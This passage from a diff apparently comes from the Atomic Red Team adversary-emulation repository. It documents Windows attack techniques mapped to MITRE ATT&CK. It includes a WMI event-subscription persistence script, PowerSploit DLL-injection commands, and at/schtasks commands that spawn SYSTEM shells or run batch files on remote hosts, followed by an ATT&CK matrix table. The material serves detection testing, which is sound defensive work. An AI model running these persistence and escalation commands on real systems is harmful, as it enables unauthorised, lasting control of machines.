Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
$ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
$FilterToConsumerArgs = @{
Filter = [Ref] $Filter
Consumer = [Ref] $Consumer
}
$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
```
After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Cleanup:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
```
#### References
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545

10
Windows/Privilege Escalation/Bypass_User_Account_Control.md Normal file
View File

@ -0,0 +1,10 @@
# Bypass User Account Control
MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
There are many ways to perform UAC bypasses when a user is in the local administrator group on a system, so it may be difficult to target detection on all variations. Efforts should likely be placed on mitigation and collecting enough information on process launches and actions that could be performed before and after a UAC bypass is performed.
## Test Script
[UACBypass](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/UACBypass)

17
Windows/Privilege Escalation/DLL Injection.md Normal file
View File

@ -0,0 +1,17 @@
## DLL Injection
MITRE ATT&CK Technique: [T1055](https://attack.mitre.org/wiki/Technique/T1055)
Examples and code resource for [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/CodeExecution)
### PowerShell Invoke-ReflectivePEInjection
Input:
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-ReflectivePEInjection.ps1
### Powershell Invoke-DllInjection
Input:
C:\Users\Public\PowerSploit-master\PowerSploit-master\CodeExecution\Invoke-DllInjection.ps1 -ProcessID 4274 -Dll evil.dll

34
Windows/Privilege Escalation/Scheduled Task.md Normal file
View File

@ -0,0 +1,34 @@
## Scheduled Task
MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053)
## at.exe
Note: deprecated in Windows 8+
### Privileged Escalation
This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system.
Input:
at 13:20 /interactive cmd
Example:
net use \\[computername|IP] /user:DOMAIN\username password
net time \\[computername|IP]
at \\[computername|IP] 13:20 c:\temp\evil.bat
## schtask.exe
### Launch Interactive cmd.exe
Input:
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
Input:
schtasks /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"

40
Windows/Windows.md Normal file
View File

@ -0,0 +1,40 @@
## MITRE ATT&CK Matrix - Windows
| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control |
|-------------------------------------------------------|---------------------------------------|-----------------------------------------|----------------------------------------|----------------------------------------|-------------------------------------|------------------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
| [Accessibility Features](Persistence/Accessibility_Features.md) | Access Token Manipulation | Access Token Manipulation | Account Manipulation | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Application Shimming](Persistence/Application_Shimming.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
| [AppInit DLLs](Persistence/AppInit_DLLs.md) | [Accessibility Features](Persistence/Accessibility_Features.md) | Binary Padding | [Brute Force](Credential_Access/Brute_Force.md) | Application Window Discovery | Exploitation of Vulnerability | Command-Line Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
| [Application Shimming](Persistence/Application_Shimming.md) | [AppInit DLLs](Persistence/AppInit_DLLs.md) | Bypass User Account Control | [Create Account](Credential_Access/Create%20Account.md) | File and Directory Discovery | Logon Scripts | Execution through API | Clipboard Data | Data Encrypted | Connection Proxy |
| Authentication Package | [Application Shimming](Persistence/Application_Shimming.md) | Code Signing | [Credential Dumping](Credential_Access/Credential%20Dumping.md) | Network Service Scanning | Pass the Hash | Execution through Module Load | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol |
| Bootkit | Bypass User Account Control | Component Firmware | Credentials in Files | Network Share Discovery | Pass the Ticket | Graphical User Interface | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol |
| [Change Default File Association](Persistence/Change_Default_file_association.md) | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Component Object Model Hijacking | Exploitation of Vulnerability | Peripheral Device Discovery | Remote Desktop Protocol | [InstallUtil](Execution/InstallUtil.md) | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data Encoding |
| Component Firmware | DLL Search Order Hijacking | [DLL Injection](Privilege%20Escalation/DLL%20Injection.md) | Input Capture | Permission Groups Discovery | Remote File Copy | [PowerShell](Execution/PowerShell.md) | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation |
| Component Object Model Hijacking | Exploitation of Vulnerability | DLL Search Order Hijacking | Network Sniffing | Process Discovery | Remote Services | Process Hollowing | Email Collection | Exfiltration Over Physical Medium | Fallback Channels |
| DLL Search Order Hijacking | File System Permissions Weakness | DLL Side-Loading | Private Keys | [Query Registry](Discovery/Query%20Registry.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | Scheduled Transfer | Multi-Stage Channels |
| External Remote Services | Local Port Monitor | Deobfuscate/Decode Files or Information | Two-Factor Authentication Interception | [Remote System Discovery](Discovery/Remote%20System%20Discovery.md) | Shared Webroot | [Regsvr32](Execution/Regsvr32.md) | Screen Capture | | Multiband Communication |
| File System Permissions Weakness | New Service | Disabling Security Tools | | Security Software Discovery | Taint Shared Content | Rundll32 | Video Capture | | Multilayer Encryption |
| Hidden Files and Directories | Path Interception | Exploitation of Vulnerability | | [System Information Discovery](Discovery/System%20Information%20Discovery.md) | Third-party Software | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | | | Remote File Copy |
| Hypervisor | [Scheduled Task](Privilege%20Escalation/Scheduled%20Task.md) | [File Deletion](Defense%20Evasion/File_deletion.md) | | System Network Configuration Discovery | [Windows Admin Shares](Lateral%20Movement/Windows%20Admin%20Shares.md) | Scripting | | | Standard Application Layer Protocol |
| Local Port Monitor | Service Registry Permissions Weakness | File System Logical Offsets | | System Network Connections Discovery | Windows Remote Management | Service Execution | | | Standard Cryptographic Protocol |
| Logon Scripts | Valid Accounts | Hidden Files and Directories | | [System Owner/User Discovery](Discovery/System%20Owner-User%20Discovery.md) | | Third-party Software | | | Standard Non-Application Layer Protocol |
| Modify Existing Service | Web Shell | Indicator Blocking | | System Service Discovery | | Trusted Developer Utilities | | | Uncommonly Used Port |
| [Netsh Helper DLL](Persistence/Netsh_Helper_DLL.md) | | Indicator Removal from Tools | | System Time Discovery | | [Windows Management Instrumentation](Execution/Windows%20Management%20Instrumentation.md) | | | Web Service |
| New Service | | [Indicator Removal on Host](Defense%20Evasion/Indicator%20Removal%20on%20Host.md) | | | | [Windows Remote Management](Lateral%20Movement/Windows%20Remote%20Management.md) | | | |
| Office Application Startup | | Install Root Certificate | | | | [Bitsadmin](Execution/Bitsadmin.md) | | | |
| Path Interception | | [InstallUtil](Execution/RegsvcsRegasm.md) | | | | | | | |
| Redundant Access | | Masquerading | | | | | | | |
| Registry Run Keys / Start Folder | | Modify Registry | | | | | | | |
| Scheduled Task | | NTFS Extended Attributes | | | | | | | |
| Security Support Provider | | Network Share Connection Removal | | | | | | | |
| Service Registry Permissions Weakness | | Obfuscated Files or Information | | | | | | | |
| Shortcut Modification | | Process Hollowing | | | | | | | |
| System Firmware | | Redundant Access | | | | | | | |
| Valid Accounts | | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | | | | | | | |
| Web Shell | | [Regsvr32](Execution/Regsvr32.md) | | | | | | | |
| [Windows Management Instrumentation Event Subscription](Persistence/Windows_Management_Instrumentation_Event_Subscription.md) | | Rootkit | | | | | | | |
| Winlogon Helper DLL | | Rundll32 | | | | | | | |
| | | Scripting | | | | | | | |
| | | Software Packing | | | | | | | |
| | | Timestomp | | | | | | | |
| | | [Trusted Developer Utilities](Execution/Trusted_Developer_Utilities.md) | | | | | | | |
| | | Valid Accounts | | | | | | | |